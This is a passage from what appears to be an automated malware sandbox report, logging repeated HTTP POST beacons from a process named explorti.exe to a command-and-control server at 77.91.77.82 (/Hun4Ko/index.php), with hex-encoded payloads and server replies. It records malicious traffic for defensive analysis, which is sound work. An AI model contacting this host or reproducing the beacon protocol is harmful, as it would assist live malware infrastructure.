                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:09.405306101 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.44973677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:09.521517038 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:10.219419003 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:10.220267057 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:10.438333988 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.44973777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:10.553375006 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:11.290937901 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:11.292999983 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:11.523827076 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.44973877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:11.647521019 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:12.345360041 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:12.346448898 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:12.563783884 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.44973977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:12.680932999 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:13.378767014 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:13.379724026 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:13.597537041 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.44974077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:13.725559950 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:14.414599895 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:14.415323019 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:14.633209944 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.44974177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:14.740161896 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:15.458205938 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:15.459114075 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:15.681932926 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.44974277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:15.802874088 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:16.495454073 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:16.496362925 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:16.713490963 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.44974477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:16.849536896 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:17.564331055 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:17.565274000 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:17.786777020 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.44974677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:17.896378994 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:18.636194944 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:18.636989117 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:18.868288040 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.44974977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:18.990667105 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:19.705590963 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:19.706707954 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:19.932682991 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.44975177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:20.053862095 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:20.771271944 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:20.773139000 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:21.001621008 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.44975377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:21.119020939 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:21.839097977 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:21.840107918 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:22.066912889 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
